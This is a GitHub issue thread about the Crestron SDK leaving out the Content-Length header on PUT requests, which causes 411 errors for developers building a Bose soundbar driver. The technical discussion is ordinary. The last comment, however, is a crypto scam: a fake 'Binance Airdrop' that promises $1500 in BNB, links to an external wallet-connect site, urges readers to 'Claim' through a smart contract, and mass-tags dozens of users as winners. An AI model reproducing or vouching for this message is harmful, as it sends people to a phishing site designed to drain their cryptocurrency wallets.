### ISSUE TITLE
PUT and content-length

### ISSUE THREAD

**Issue by Pietro395** [bitm0de/HttpsUtility#7]
We are using this module to develop a driver for a BOSE soundbar.

We have successfully implemented the GET and POST methods.
Testing with postman the same parameters used in the POST, in the PUT it works correctly.

While with the PUT method on Crestron we get the error '411 - Length Required'.

We tried to manually insert the Content-Length in the header but without success.

Is the Content-Length in the PUT implemented and sent in the request?

![immagine](https://user-images.githubusercontent.com/50447537/171445099-8e5c0f17-660d-4df0-b7e8-475c037ad81f.png)

**Comment by skar395** [comment]
> It's definitely a bug in the Crestron SDK because the content source is being set to string for every other method except GET. DELETE probably could've been added to that exclusion list, although if there's a defined content string then the underlying libraries should be setting the header.

Thanks, is there a way to report this bug to Crestron?

**Comment by bitm0de** [comment]
> > It's definitely a bug in the Crestron SDK because the content source is being set to string for every other method except GET. DELETE probably could've been added to that exclusion list, although if there's a defined content string then the underlying libraries should be setting the header.
> 
> Thanks, is there a way to report this bug to Crestron?

You'd have to go through TrueBlue support, although I suspect this would still take some time to be acknowledged and fixed. There may be some properties that can be set to force it to send the Content-Length header, although by default it's not working as it should. When the content source and content is set, it should be sending that length in the applicable Content-Length header, always.

**Comment by bitm0de** [comment]
Are you trying to send an empty string for the content of your PUT request?

**Comment by skar395** [comment]
No, my content string was set, i think i'm missing content-source.

We currently do not have access to the Simpl #, so I believe that for now it is infeasible for us to report the bug

**Comment by skar395** [comment]
A quick follow up, I created a project and sent to support to recreate the problem.
I confirm that the content-length is missing in the PUT requests. You can see this in the response from the endpoint

POST:
![immagine](https://user-images.githubusercontent.com/50447537/173874610-929605af-7936-4605-a490-81d58b7ef522.png)

PUT:
![immagine](https://user-images.githubusercontent.com/50447537/173874637-d8468c3f-ae57-4cb0-8884-6ff162e3e324.png)

**Comment by bitm0de** [comment]
> A quick follow up, I created a project and sent to support to recreate the problem. I confirm that the content-length is missing in the PUT requests. You can see this in the response from the endpoint
> 
> POST: ![immagine](https://user-images.githubusercontent.com/50447537/173874610-929605af-7936-4605-a490-81d58b7ef522.png)
> 
> PUT: ![immagine](https://user-images.githubusercontent.com/50447537/173874637-d8468c3f-ae57-4cb0-8884-6ff162e3e324.png)

I understand that it's missing, the point I was attempting to make above is that you don't have to do this for a POST request because this is intended to be controlled by the Crestron class itself when the content is set. This is also how Microsoft's .NET 4.5+ HttpClient class works, but it doesn't miss including the Content-Length header (it does as it should).

**Comment by skar395** [comment]
> 
In the example above, in fact, I did not manually add the content length, I would like it to be inserted automatically by the Crestron class also in the PUT :)
Are you referring to this?

**Comment by mohamedSalehHegazy** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @Akaizoku, @rohabadi, @StarZ3r0, @bigmarselo, @DUONGPOY, @jangsoopark, @muneebsa, @florinbroasca, @vikidi, @joungkookismekooki, @yanzhang422, @dudulock, @KyBau, @RRFish, @oleewere, @tsarpaul, @angtsusiong, @angeliedu, @lianyi, @iamyates, @Author01, @selim, @xlitus, @CorgiRomano, @xu-Fencer, @meosu, @andrefreitas, @TheMostHated115, @AroraShreshth, @HMDsarar, @charliegreen, @cs686, @ivangomes, @al3mart, @muddlebee, @PsykeDady, @resmo, @Ram042, @codigocarvalho, @mayonaze2g, @DesLeeHL, @crosseax, @AlexWuYh, @xwy2010, @absturzkind00, @Driblinho, @Dylusional12Nynja, @minnidiesel, @omskiyyozh, @dabenman
